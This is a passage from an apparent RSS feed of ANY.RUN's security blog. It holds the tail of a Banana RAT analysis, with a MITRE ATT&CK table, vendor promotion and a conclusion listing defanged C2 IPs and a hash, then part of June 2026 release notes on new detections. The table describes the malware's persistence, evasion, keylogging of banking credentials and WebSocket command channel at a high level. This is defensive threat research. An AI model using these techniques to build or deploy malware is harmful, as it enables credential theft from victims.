                    >
                                        T1053.005                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D4"
                    data-col-index="3"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Automated deployment of hidden tasks executed as SYSTEM via Register-ScheduledTask                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Persistence                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        T1547.001                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D5"
                    data-col-index="3"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Fallback persistence structure utilizing HKCU\...\CurrentVersion\Run if privileges are not elevated                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Obfuscated Files or Information                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        T1027                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D6"
                    data-col-index="3"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Multi-layered character reconstruction algorithms (ofuscador.py) and backend string splitting.                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Hide Artifacts: Hidden Files and Directories                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        T1564.001                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D7"
                    data-col-index="3"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Target payload files and persistence launchers utilize system attributes and restricted paths.                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Defense Evasion                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Deobfuscate/Decode Files or Information                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        T1140                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D8"
                    data-col-index="3"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Memory-side invocation of base64-decoded wrappers and .NET reflection for sensitive API calls                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Discovery                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        System Information Discovery                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        T1082                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D9"
                    data-col-index="3"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Active extraction of MachineGuid and environment flags to generate host-specific parameters.                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Discovery                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Process Discovery                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        T1057                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D10"
                    data-col-index="3"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Automated verification of active processes against hardcoded local defense lists.                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Collection                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Input Capture: Keylogging                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        T1056.001                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D11"
                    data-col-index="3"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Native API-level monitoring (keybd_event) for capturing active banking credentials.                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Collection                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Screen Capture                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        T1113                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D12"
                    data-col-index="3"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        In-memory .NET reflection calling screenshot routines and web overlay injections.                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A13"
                    data-col-index="0"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Command & Control                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B13"
                    data-col-index="1"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Application Layer Protocol: Web Protocols                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C13"
                    data-col-index="2"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        T1071.001                      </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="D13"
                    data-col-index="3"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        High-frequency asynchronous communication over WebSockets (wss://.../agent).                      </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-339'>
table#wpdtSimpleTable-339{ table-layout: fixed !important; }
table#wpdtSimpleTable-339 td, table.wpdtSimpleTable339 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h2 class="wp-block-heading">Building a Proactive Defense to Mitigate BananaRAT Risks and Accelerate Response</h2>



<p class="wp-block-paragraph">To strengthen your SOC’s defense against complex threats like BananaRAT, <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananarat&amp;utm_term=070726&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong></a> offers a risk-based approach that bridges the gap between technical detection and business continuity. Here is how the platform enhances security operations:</p>



<h3 class="wp-block-heading"><strong>Keep Perimeter Defense Up-to-Date with Real-Time Intelligence</strong>&nbsp;</h3>



<p class="wp-block-paragraph">By integrating live <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananarat&amp;utm_term=070726&amp;utm_content=linktofeedslanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Feeds</strong></a> directly into SIEM and SOAR systems, SOC teams can block emerging BananaRAT variants at the perimeter before they penetrate the network. This proactive layer is powered by a global community of over 15,000 organizations, providing a continuous stream of enriched IOCs that allow security teams to recognize and neutralize new attack patterns within the first 24 hours of their launch.</p>



<h3 class="wp-block-heading"><strong>Accelerate Triage and Empower Tier 1 Analysts</strong> <strong>for Early Response</strong></h3>



<p class="wp-block-paragraph">ANY.RUN shortens the critical decision window by allowing Tier 1 analysts to safely detonate suspicious files and URLs in the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananarat&amp;utm_term=070726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>interactive Sandbox</strong></a> environment. Instead of escalating every alert, junior analysts can independently validate threats in under two minutes, uncovering the full execution chain and behavioral indicators of a sample.</p>



<p class="wp-block-paragraph">Analysts can also quickly enrich isolated indicators with actionable context. For instance, if an analyst encounters a suspicious file hash associated with a BananaRAT attack, such as:&nbsp;</p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup/??utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananarat&amp;utm_term=070726&amp;utm_content=linktolookup#%7B%22query%22:%22md5:%5C%22e3f81120502a2945f3f0eaabc28e6d3f%5C%22%22,%22dateRange%22:180%7D" target="_blank" rel="noreferrer noopener"><strong>md5:&#8221;e3f81120502a2945f3f0eaabc28e6d3f&#8221;</strong></a></p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="589" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/bananarat_lookup-1024x589.png" alt="" class="wp-image-21991" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/bananarat_lookup-1024x589.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/bananarat_lookup-300x173.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/bananarat_lookup-768x442.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/bananarat_lookup-1536x883.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/bananarat_lookup-370x213.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/bananarat_lookup-270x155.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/bananarat_lookup-740x426.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/bananarat_lookup.png 1826w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">TI Lookup quickly links an isolated hash to the full BananaRAT sample complete with a sandbox report</figcaption></figure>



<p class="wp-block-paragraph">They can use <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananarat&amp;utm_term=070726&amp;utm_content=linktolookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Lookup</strong></a> to instantly tie it to a complete sandbox report. This capability allows junior analysts to independently validate threats in under two minutes, uncovering the full execution chain and reducing the Mean Time to Response (MTTR) by an average of 21 minutes.<br></p>



<h3 class="wp-block-heading"><strong>Shift to Proactive Threat Hunting and Risk Mitigation</strong>&nbsp;</h3>



<p class="wp-block-paragraph">To move beyond reactive defense, Tier 2 and Tier 3 analysts utilize TI Lookup, <a href="https://intelligence.any.run/analysis/yara/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananarat&amp;utm_term=070726&amp;utm_content=linktoyarasearch" target="_blank" rel="noreferrer noopener">TI YARA Search</a> to stay ahead of evolving malware families. By accessing a massive database of historical and real-time intelligence, teams can track the evolution of BananaRAT samples, identify associated infrastructure, and significantly reduce &#8220;dwell time&#8221;. </p>



<p class="wp-block-paragraph">ANY.RUN also provides <a href="https://intelligence.any.run/reports/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananarat&amp;utm_term=070726&amp;utm_content=linktotireports" target="_blank" rel="noreferrer noopener">TI Reports</a>, compiled by the internal team of threat hunters and malware analysts. A prime example is the <a href="https://intelligence.any.run/reports/2026-06-05-threat-brief-liberlycrypt-banana-rat-ekz/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananarat&amp;utm_term=070726&amp;utm_content=linktotireports" target="_blank" rel="noreferrer noopener">BananaRAT threat research report</a> (Available with <a href="https://intelligence.any.run/plans/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=bananarat&amp;utm_term=070726&amp;utm_content=linktotipricing" target="_blank" rel="noreferrer noopener">TI Core or Complete subscriptions</a>) published in early June, which provides a detailed overview of current activity and ready-made intelligence for updating detection rules</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="600" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/banaRATreport-1024x600.png" alt="" class="wp-image-21992" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/banaRATreport-1024x600.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/banaRATreport-300x176.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/banaRATreport-768x450.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/banaRATreport-1536x900.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/banaRATreport-370x217.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/banaRATreport-270x158.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/banaRATreport-740x433.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/banaRATreport.png 1837w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">ANY.RUN&#8217;s analysts provided an actionable report on BananaRAT back in June of 2026</figcaption></figure>



<p class="wp-block-paragraph">This proactive stance ensures that defenses are updated based on active research, effectively neutralizing costly incidents before they disrupt core business processes.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">The exposed server at 198[.]245[.]53[.]26 gave a rare opportunity to compare two related Banana RAT branches through live infrastructure, sandbox telemetry, and recovered payloads. The older branch used ETW-themed paths, static Microsoft-looking names, and a typo-based pseudo-Microsoft C2 identity. The newer branch kept the same staging concept but moved to randomized install identifiers, better-structured SYSTEM persistence, and a WebSocket channel built around a hashed testewin.com subdomain.</p>



<p class="wp-block-paragraph">The main takeaways are:</p>



<p class="wp-block-paragraph">The staging host remained stable across both detonations.</p>



<p class="wp-block-paragraph">The payload branch changed significantly between May 25, 2026 and June 09, 2026.</p>



<p class="wp-block-paragraph">The newer runtime payload recovered from disk exactly matches the sandbox-dropped payload (same SHA256).</p>



<p class="wp-block-paragraph">The fallback IP 149[.]56[.]12[.]51 is a reliable cross-branch anchor.</p>



<p class="wp-block-paragraph">The public index exposed not only stage files but also backend tooling consistent with active, polymorphic payload generation.</p>



<p class="wp-block-paragraph"></p>
<p>The post <a href="https://any.run/cybersecurity-blog/banana-rat-evolution-analysis/">Banana RAT Evolves: Comparing Two Recent Branches Through ANY.RUN </a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/banana-rat-evolution-analysis/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Release Notes: In-Browser Data Inspection, Torq Integration, and 1,100+ Threat Coverage Updates</title>
		<link>https://any.run/cybersecurity-blog/release-notes-june-2026/</link>
					<comments>https://any.run/cybersecurity-blog/release-notes-june-2026/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 01 Jul 2026 11:31:25 +0000</pubDate>
				<category><![CDATA[Service Updates]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[release]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=21857</guid>

					<description><![CDATA[<p>Phishing pages don&#8217;t sit still anymore. They redirect, load scripts, harvest credentials through dynamic forms, and rebuild their DOM after the initial load — and most URL analysis workflows still only see the finish line, not the race. This June, ANY.RUN closed that gap directly inside the Interactive Sandbox and extended its automation reach with [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/release-notes-june-2026/">Release Notes: In-Browser Data Inspection, Torq Integration, and 1,100+ Threat Coverage Updates</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">Phishing pages don&#8217;t sit still anymore. They redirect, load scripts, harvest credentials through dynamic forms, and rebuild their DOM after the initial load — and most URL analysis workflows still only see the finish line, not the race. This June, ANY.RUN closed that gap directly inside the Interactive Sandbox and extended its automation reach with a new integration built for scale. </p>



<p class="wp-block-paragraph">Here&#8217;s what your team can put to work this month: full browser-level visibility for every URL analysis, a no-code path to embed ANY.RUN in Torq playbooks, and over 1,100 new detections across behavior signatures, Suricata rules, and YARA rules.&nbsp;</p>



<h2 class="wp-block-heading">Product Updates&nbsp;</h2>



<p class="wp-block-paragraph">June&#8217;s releases focus on closing the visibility gap in phishing investigations and giving SOC and MSSP teams a faster route from alert to automated response. The headline update is in-browser data inspection, a new investigation layer in the Interactive Sandbox, alongside a new integration with the Torq AI SOC Platform.&nbsp;</p>



<h3 class="wp-block-heading">Closing the Phishing Blind Spot with In-Browser Data Inspection</h3>



<p class="wp-block-paragraph">Modern phishing campaigns rarely stop at a malicious URL. They rely on dynamic content, JavaScript, multi-stage redirects, credential harvesting forms, and browser-based tricks that often remain invisible to traditional analysis methods.&nbsp;</p>



<p class="wp-block-paragraph">This month, ANY.RUN <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/">introduced In-Browser Data Inspection</a>, a new capability that captures browser-rendered content during URL analysis, revealing exactly what users would experience when interacting with a suspicious website. </p>



<p class="wp-block-paragraph">Instead of relying solely on page source or network data, analysts can now inspect:&nbsp;</p>



<ul class="wp-block-list">
<li>Fully rendered web pages and dynamic content; </li>



<li>Phishing forms and credential collection attempts; </li>



<li>Client-side JavaScript execution; </li>



<li>Redirect chains and browser behavior; </li>



<li>Hidden elements designed to evade detection.</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="831" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/unfo1-1662x2048-1-831x1024.png" alt="" class="wp-image-21895" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/unfo1-1662x2048-1-831x1024.png 831w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/unfo1-1662x2048-1-243x300.png 243w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/unfo1-1662x2048-1-768x946.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/unfo1-1662x2048-1-1247x1536.png 1247w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/unfo1-1662x2048-1-370x456.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/unfo1-1662x2048-1-270x333.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/unfo1-1662x2048-1-740x912.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/unfo1-1662x2048-1.png 1662w" sizes="auto, (max-width: 831px) 100vw, 831px" /><figcaption class="wp-element-caption"><em>See all URL details, DOM changes, network requests, and IOCs in one place</em> <br></figcaption></figure>



<p class="wp-block-paragraph">For SOC analysts, this means fewer blind spots during phishing investigations and faster validation of suspicious URLs.&nbsp;</p>



<p class="wp-block-paragraph">For security managers and CISOs, it means higher confidence in phishing detection, quicker incident triage, and better protection against increasingly sophisticated browser-based attacks.&nbsp;</p>



<h3 class="wp-block-heading">Scaling Triage and Response with the ANY.RUN &amp; Torq Integration</h3>



<p class="wp-block-paragraph">Alert volume keeps growing faster than SOC headcount, and every alert that lands without context costs an analyst time they don&#8217;t have. ANY.RUN&#8217;s <a href="https://any.run/cybersecurity-blog/torq-integration/">new integration with the Torq AI SOC Platform</a> puts conclusive malware and phishing verdicts directly into the automated workflows teams already build in Torq: no custom code, no months-long rollout. </p>



<p class="wp-block-paragraph">The integration ships with five ready-to-use <a href="https://torq.io/hyperagents/">Torq HyperAgents</a><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> covering two workflow types: case-based templates that pull observables straight from an open Torq case for enrichment, and standalone sandbox workflows that accept a URL or file as input and return a full verdict, IOC list, and report link anywhere in a custom automation chain. Results — reputation data, threat names, tags, and structured JSON — land directly in Torq Case Management, ready to branch on. </p>



<p class="wp-block-paragraph"><strong>Teams integrating ANY.RUN into Torq gain:</strong> </p>



<ul class="wp-block-list">
<li>Faster incident resolution, with an average MTTR reduction of 21 minutes per case. </li>



<li>Operational scaling without added headcount, as HyperAgents absorb routine Tier 1 enrichment work. </li>



<li>Zero development overhead, with a no-code setup that&#8217;s live in minutes rather than months. </li>



<li>Standardized investigation logic, so every alert is checked against the same high-fidelity criteria regardless of analyst experience. </li>



<li>Higher ROI on existing tools, as ANY.RUN enriches the SIEM, EDR, and XDR data already flowing into Torq. </li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="427" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image7-2-1024x427.png" alt="" class="wp-image-21898" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image7-2-1024x427.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image7-2-300x125.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image7-2-768x320.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image7-2-370x154.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image7-2-270x112.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image7-2-740x308.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image7-2.png 1318w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">ANY.RUN’s Sandbox provides fast case enrichment in Torq</figcaption></figure>



<p class="wp-block-paragraph">The integration is available on ANY.RUN Threat Intelligence and Interactive Sandbox plans with API access, giving SOC and MSSP teams a direct path to scale triage and response without scaling the team itself.&nbsp;</p>



<p class="wp-block-paragraph"></p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Experience the latest ANY.RUN capabilities.<br>
<span class="highlight">Gain deeper browser visibility and accelerate investigations <br></span>with Torq-powered automation.

</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Integrate in your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Threat Coverage Updates</h2>



<p class="wp-block-paragraph">Keeping pace with evolving malware remains a core priority for our detection team. During June, we significantly expanded threat coverage with:</p>



<ul class="wp-block-list">
<li>1,055 new Suricata rules,</li>



<li>65 new behavior signatures,</li>



<li>14 new YARA rules.</li>
</ul>



<p class="wp-block-paragraph">These additions improve detection across network traffic, behavioral activity, and malware samples, helping analysts identify emerging threats faster while increasing investigation accuracy. The continuous expansion of detection logic also strengthens the quality of intelligence powering ANY.RUN&#8217;s Interactive Sandbox and Threat Intelligence solutions.</p>



<h2 class="wp-block-heading">New Behavior Signatures</h2>



<p class="wp-block-paragraph">The 65 new behavior signatures added this month target malware-specific activity helping analysts confirm what a sample actually does inside the sandbox, rather than inferring it from static traits alone. Coverage this month spans commodity stealers and loaders, RATs, and ransomware families active across recent phishing and malvertising campaigns.</p>



<p class="wp-block-paragraph">Highlighted&nbsp;detections&nbsp;include:&nbsp;</p>



<div class="wp-block-group is-layout-grid wp-container-core-group-is-layout-9d260ee2 wp-block-group-is-layout-grid">
<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/24a03e00-b8f1-4557-b1c3-6b473d0990b9/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>SOLARIS</strong></a> (mutex) </li>
</ul>



<ul class="wp-block-list">
<li><strong><a href="https://app.any.run/tasks/0134f484-cf7b-4446-8375-feca3a52dca8/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">SILENTNET</a> </strong></li>
</ul>



<ul class="wp-block-list">
<li><strong><a href="https://app.any.run/tasks/56d64e4d-7797-4122-8d5c-ae313e4d2a09/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ORACLESPY (YARA rule)</a> </strong></li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/839c2d61-4169-416a-953e-93f01bc62654?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-may-2026&amp;utm_term=030626&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>KONG</strong></a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/0024567d-04f2-4265-bddf-73f5a1c3755c/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>HIDDENTEARS</strong></a> (mutex)</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/000eb0da-4208-4e07-85a5-d93f906b60c4/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>GLAMOUR (mutex)</strong></a><strong> </strong></li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/a9d8ecff-7c7d-4a3c-80da-76e70ca8cc26/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-may-2026&amp;utm_term=030626&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>STEALC</strong></a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/60773dd2-262f-45f5-8a4e-38f7102bfbb2/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-may-2026&amp;utm_term=030626&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>BLANKGRABBER</strong></a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
